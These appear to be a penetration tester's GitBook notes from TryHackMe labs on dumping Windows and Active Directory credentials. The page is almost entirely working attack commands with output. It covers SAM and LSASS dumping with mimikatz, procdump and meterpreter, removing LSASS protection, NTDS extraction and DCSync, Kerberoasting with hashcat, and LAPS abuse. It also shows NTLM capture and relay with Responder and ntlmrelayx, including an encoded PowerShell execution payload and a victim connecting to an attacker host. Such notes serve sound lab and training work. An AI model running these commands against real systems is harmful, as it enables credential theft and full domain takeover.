# 4. Dumping Credentials

## Dumping SAM

SAM file typically cannot be access if Windows is running

```bash
c:\\Windows\\System32\\config\\sam
```

So we exploit it via&#x20;

* meterpreter
* mimikatz
* Volume Shadow Copy Service / Registry Hives

Meterpreter Method

```bash
meterpreter > getuid
Server username: THM\\Administrator
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3b784d80d18385cea5ab3aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:443e64439a4b7fe780db47fc06a3342d:::
```

Volume Shadow Copy Service / Registry Hives

{% code overflow="wrap" %}

```bash
C:\\Users\\Administrator>wmic shadowcopy call create Volume='C:\\'

Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
        ShadowID = "{D8A11619-474F-40AE-A5A0-C2FAA1D78B85}";
};
```

{% endcode %}

Getting info from registry hives

{% code overflow="wrap" %}

```bash
C:\\Users\\Administrator\\Desktop>reg save HKLM\\sam C:\\users\\Administrator\\Desktop\\sam-reg

```

{% endcode %}

With either the Shadow Copy or SAM from the Registry Hive, we need to decrypt it with the key found in `c:\\Windows\\System32\\Config\\system`.

{% code overflow="wrap" %}

```bash
C:\\Users\\Administrator\\Desktop>reg save HKLM\\system C:\\users\\Administrator\\Desktop\\system-reg
```

{% endcode %}

Once we get both pieces of information, we move them to the attacker machine to decrypt the information

{% code overflow="wrap" %}

```bash
user@machine:~ python3.9 /opt/impacket/examples/secretsdump.py -sam /tmp/sam-reg -system /tmp/system-reg LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```

{% endcode %}

## Dumping LSASS

LSASS contains password hashes

Before dumping LSASS, we need to disable LSA Protection using mimikatz

```
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]
```

Creating a dump file via GUI

<figure><img src="https://3058261645-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJdAk5WnJDW6XiiRqO51Y%2Fuploads%2FQ2MgQ92MS5aGUPY9M95y%2Fw8j88pzy.bmp?alt=media&#x26;token=ff08f2c1-bff8-4af4-a8df-83371d337998" alt=""><figcaption></figcaption></figure>

Dumping via `SysinteralsSuite`

```
c:\>c:\Tools\SysinternalsSuite\procdump.exe -accepteula -ma lsass.exe c:\Tools\Mimikatz\lsass_dump

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[09:09:33] Dump 1 initiated: c:\Tools\Mimikatz\lsass_dump-1.dmp
[09:09:33] Dump 1 writing: Estimated dump file size is 162 MB.
[09:09:34] Dump 1 complete: 163 MB written in 0.4 seconds
[09:09:34] Dump count reached.
```

Dumping via mimikatz

```
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515377 (00000000:0007dd31)
Session           : RemoteInteractive from 3
User Name         : Administrator
Domain            : THM
Logon Server      : CREDS-HARVESTIN
Logon Time        : 6/3/2022 8:30:44 AM
SID               : S-1-5-21-1966530601-3185510712-10604624-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : THM
         * NTLM     : 98d3a787a80d08385cea7fb4aa2a4261
         * SHA1     : 64a137cb8178b7700e6cffa387f4240043192e72
         * DPAPI    : bc355c6ce366fdd4fd91b54260f9cf70
...
```

## Dumping from Windows Credential Manager

`vaultcmd` to find any stored credentials

```bash
C:\\Users\\Administrator>vaultcmd /list
Currently loaded vaults:
        Vault: Web Credentials
        Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        Location: C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

        Vault: Windows Credentials
        Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
        Location: C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Vault
```

&#x20;`/listproperties` to check if there are any stored credentials in the vault

```bash
C:\\Users\\Administrator>VaultCmd /listproperties:"Web Credentials"
Vault Properties: Web Credentials
Location: C:\\Users\\Administrator\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Number of credentials: 1
Current protection method: DPAPI
```

Extract out the password using `Get-WebCredentials.ps1`

```bash
C:\\Users\\Administrator>powershell -ex bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\\Users\\Administrator> Import-Module C:\\Tools\\Get-WebCredentials.ps1
PS C:\\Users\\Administrator> Get-WebCredentials

UserName  Resource             Password     Properties
--------  --------             --------     ----------
THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}
```

Using `cmdkey`, we can see which credentials are already stored in the session

```markup
C:\\Users\\thm>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=thm\\thm-local
    Type: Domain Password
    User: thm\\thm-local
```

Knowing this, we can use `runas /savecred` to ride on this saved credential in the session for authentication on the domain `THM.red`

```bash
C:\\Users\\thm>runas /savecred /user:THM.red\\thm-local cmd.exe
Attempting to start cmd.exe as user "THM.red\\thm-local" ...
```

Dumping credentials on the Credential Manager using mimikatz

```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman
```

## Dumping from Domain Controller

### NTDS

New Technologies Directory Services (NTDS) is a database containing all Active Directory data, including objects, attributes, credentials

NTDS is located in `C:\\Windows\\NTDS`

Decrypting the NTDS file requires a system Boot Key which is stored in the `C:\Windows\System32\config\SECURITY`

In essence, we need these 3 files

* `C:\\Windows\\NTDS\\ntds.dit`
* `C:\\Windows\\System32\\config\\SYSTEM`
* `C:\\Windows\\System32\\config\\SECURITY`

Using `ntdsutil.exe`, this will dump out all 3 files we need in `C:\\temp`

```bash
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q"
```

Get those files on the attacker machines, and decrypt it with impacket to get the hashes

{% code overflow="wrap" %}

```bash
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -security path/to/SECURITY -system path/to/SYSTEM -ntds path/to/ntds.dit local
```

{% endcode %}

### DCSync

{% code overflow="wrap" %}

```powershell
mimikatz > log dumpfile.txt
mimikatz > lsadump::dcsync /domain:za.tryhackme.loc /all
```

{% endcode %}

Now we analyze the file with grep

{% code overflow="wrap" %}

```bash
cat dcdump.txt | grep "SAM Username"
cat dcdump.txt | grep "Hash NTLM"

cat dcdump.txt | grep "krbtgt" -A10 # get ntlm hash of krbtgt for golden ticket forging
cat dcdump.txt | grep "<machine name>" -A10 # get ntlm hash of machine account for silver ticket forging
```

{% endcode %}

### impacket&#x20;

{% code overflow="wrap" %}

```bash
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc THM.red/<AD_Admin_User>@10.10.224.1 

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::
thm.red\\thm:1114:aad3b435b51404eeaad3b435b51404ee:[****REMOVED****]:::

## only dumping ntlm hashes
user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm THM.red/<AD_Admin_User>@10.10.224.1
```

{% endcode %}

## Local Administrator Password Solution (LAPS)

We can check if LAPS is installed by finding the `admpwd.dll` path

```bash
C:\\Users\\thm>dir "C:\\Program Files\\LAPS\\CSE"
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\\Program Files\\LAPS\\CSE

06/06/2022  01:01 PM              .
06/06/2022  01:01 PM              ..
05/05/2021  07:04 AM           184,232 AdmPwd.dll
               1 File(s)        184,232 bytes
               2 Dir(s)  10,306,015,232 bytes free
```

Find Groups that can interact with the LAPS

```
PS C:\\Users\\thm> Find-AdmPwdExtendedRights -Identity THMorg

ObjectDN                                      ExtendedRightHolders
--------                                      --------------------
OU=THMorg,DC=thm,DC=red                       {THM\\THMGroupReader}
```

Finding users in the group

```
PS C:\\Users\\thm> net groups "THMGroupReader"
Group name     THMGroupReader
Comment

Members

-------------------------------------------------------------------------------
bk-admin
The command completed successfully.
```

Once we compromise `bk-admin`, we can then use it to access LAPS

```bash
C:\\Users\\thm> runas /user:THM\\bk-admin cmd.exe
```

{% code overflow="wrap" %}

```
PS C:\\> Get-AdmPwdPassword -ComputerName creds-harvestin

ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
CREDS-HARVESTIN      CN=CREDS-HARVESTIN,OU=THMorg,DC=thm,DC=red    FakePassword    2/11/2338 11:05:2...
```

{% endcode %}

## Kerberoasting

Kerberoasting attack involves requesting a Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS).

Using the TGS, we can attempt to brute force the password

We need the SPN (Service Principal Name) accounts such as IIS User, MSSQL, etc

{% code overflow="wrap" %}

```bash
user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.224.1 THM.red/thm

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName          Name     MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------------  -------  --------  --------------------------  ---------  ----------
http/creds-harvestin.thm.red  svc-user            2022-06-04 00:15:18.413578
```

{% endcode %}

Once we find the SPN user, we can send a single request to get a TGS ticket for the `srv-user` user using the -request-user argument.

{% code overflow="wrap" %}

```bash
user@machine$ python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.224.1 THM.red/thm -request-user svc-user 

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName          Name     MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------------  -------  --------  --------------------------  ---------  ----------
http/creds-harvestin.thm.red  svc-user            2022-06-04 00:15:18.413578

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc-user$THM.RED$THM.red/svc-user*$8f5de4211da1cd5715217[*REMOVED*]7bfa3680658dd9812ac061c5
```

{% endcode %}

After getting the TGS, we can attempt to crack it to get the password

```bash
user@machine$ hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt
```

## NTLM Relaying

### Responder

On the attacker

```
$ sudo responder -I tun0
```

On the victim, run this. Responder should get the NTLM hash of the account which you can crack or pass

```
PS> dir //attackerip/lol
```

### NTMLRelayx

On the attacker

<pre data-overflow="wrap"><code><strong>$ impacket-ntlmrelayx --no-http-server -smb2support -t &#x3C;relay_target> -c "powershell -enc JABjAGwAaQBlAG4AdA..." 
</strong></code></pre>

On the victim, run this. NTLMRelay can capture NTLMv2 which we can crack or relay to authenticate to another server and execute code

```
PS> dir //attackerip/lol
```

## Other methods

### Powershell history file

{% code overflow="wrap" %}

```bash
C:\\Users\\USER\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
```

{% endcode %}

### Passwords in Registry

```bash
c:\\Users\\user> reg query HKLM /f password /t REG_SZ /s

C:\\Users\\user> reg query HKCU /f password /t REG_SZ /s
```

### Unattended Windows Installations

* C:\Unattend.xml
* C:\Windows\Panther\Unattend.xml
* C:\Windows\Panther\Unattend\Unattend.xml
* C:\Windows\system32\sysprep.inf
* C:\Windows\system32\sysprep\sysprep.xml

### Saved Credentials

You can’t see the passwords, but you can ride on them

```bash
cmdkey /list # seeing if there are saved creds in the session
```

```bash
runas /savecred /user:admin cmd.exe # if admin has a saved cred, we can run as him
```

### IIS Configuration

{% code overflow="wrap" %}

```bash
type C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config | findstr connectionString
```

{% endcode %}

### Software: PuTTY

{% code overflow="wrap" %}

```bash
reg query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\ /f "Proxy" /s
```

{% endcode %}